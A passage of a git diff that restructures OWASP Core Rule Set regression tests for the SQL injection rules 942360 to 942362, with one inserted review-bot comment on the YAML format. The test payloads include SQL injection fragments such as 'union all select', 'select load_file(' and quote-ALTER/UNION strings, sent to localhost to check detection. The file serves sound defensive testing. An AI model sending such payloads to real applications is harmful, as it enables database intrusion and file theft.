"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: 
localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "2759399466.1534185336 -6863 union all select 1,1,1,1,1,1,1,1,1,CONCAT" + version: HTTP/1.0 + output: + log_contains: id "942360" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml index 7c36f4b59..68532f40b 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml 
@@ -2,125 +2,116 @@ meta: author: "Christoph Hansen, azurit" description: None - enabled: true - name: 942361.yaml tests: - - test_title: 942361-1 + - test_id: 1 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "'alter a" - version: HTTP/1.0 - output: - log_contains: id "942361" - - test_title: 942361-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "'alter a" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_id: 2 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\" ALTER A" - version: HTTP/1.0 - output: - log_contains: id "942361" - - test_title: 942361-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\" ALTER A" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_id: 3 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "'ALTER A" - version: HTTP/1.0 - output: - log_contains: id "942361" - - test_title: 942361-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "'ALTER A" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_id: 4 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "' alter/" - version: HTTP/1.0 - output: - log_contains: id "942361" - - test_title: 942361-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "' alter/" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_id: 5 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\" UNION A" - version: HTTP/1.0 - output: - log_contains: id "942361" - - test_title: 942361-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\" UNION A" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_id: 6 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "'UNION A" - version: HTTP/1.0 - output: - log_contains: id "942361" - - test_title: 942361-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "'UNION A" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_id: 7 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "' union/" - version: HTTP/1.0 - output: - log_contains: id "942361" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "' union/" + version: HTTP/1.0 + output: + log_contains: id "942361" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml index 97a2dc3f4..b3a51cc1b 100644 
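Review bot: After `enabled: true` and `name: 942361.yaml` are dropped, the new-side `meta` block holds only `author` and `description`, whereas the 942370 hunk later in this patch adds a `rule_id` key in that same position; if the new test format identifies the rule through `meta.rule_id`, this file and 942362 (same pattern in its hunk below) should gain `rule_id: 942361` / `rule_id: 942362` as well. Whether that key is required depends on the runner's schema, which is not visible in the diff. As a point of style, the `Accept` header is written as a plain scalar here (`Accept: text/xml,...,*/*;q=0.5`) but quoted in the surrounding 942360 tests and in tests 30–32 of 942362; since the value contains `,`, `;` and `*`, quoting it consistently (`Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"`) avoids relying on plain-scalar parsing rules across the whole test tree.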
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml 
@@ -2,551 +2,517 @@ meta: author: "Christian S.J. Peron, Christoph Hansen, Franziska Buehler, azurit" description: None - enabled: true - name: 942362.yaml tests: - - test_title: 942362-1 + - test_id: 1 desc: "concatenated basic SQL injection and SQLLFI" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # 23423 as "sdfsdfs" FROM table - data: "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # 23423 as "sdfsdfs" FROM table + data: "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 2 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "select Char(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "select Char(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 3 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: 
- - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT CHAR(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT CHAR(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 4 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT GROUP_CONCAT(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT GROUP_CONCAT(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 5 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT group_cOnCat(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-6 + - input: + dest_addr: 
127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT group_cOnCat(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 6 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") as cc FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") as cc FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 7 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS orders FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS orders FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 8 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - 
stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS `carrier_id` from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS `carrier_id` from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 9 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "select load_file(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "select load_file(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 10 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS Role FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-11 + - input: + 
dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS Role FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 11 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "` AS `edit_user_id` from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "` AS `edit_user_id` from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 12 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS val FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS val FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 13 desc: "Detects concatenated basic SQL injection and 
SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=%60+REGEXP%20" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=%60+REGEXP%20" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 14 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS 'Durchschnitt_Importzeit' FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS 'Durchschnitt_Importzeit' FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 15 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "` AS `OXTIMESTAMP` from" - version: HTTP/1.0 - output: - 
log_contains: id "942362" - - test_title: 942362-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "` AS `OXTIMESTAMP` from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 16 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") as col_0_0_ from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") as col_0_0_ from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 17 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS `count` FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS `count` FROM" + version: HTTP/1.0 + output: + log_contains: id 
"942362" + - test_id: 18 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS schlagwoerter FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS schlagwoerter FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 19 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") as User from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") as User from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 20 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS t FROM" - 
version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS t FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 21 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "(load_file(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "(load_file(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 22 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") as ExecuteTheseSQLCommands FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-23 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") as ExecuteTheseSQLCommands FROM" + version: HTTP/1.0 
+ output: + log_contains: id "942362" + - test_id: 23 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS schlagwoerter FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-24 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS schlagwoerter FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 24 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "` AS `documentType` FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-25 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "` AS `documentType` FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 25 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - 
port: 80 - uri: "/post" - data: "! As' from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-26 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "! As' from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 26 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "; As not from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-27 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "; As not from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 27 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT load_file(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-28 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT load_file(" + 
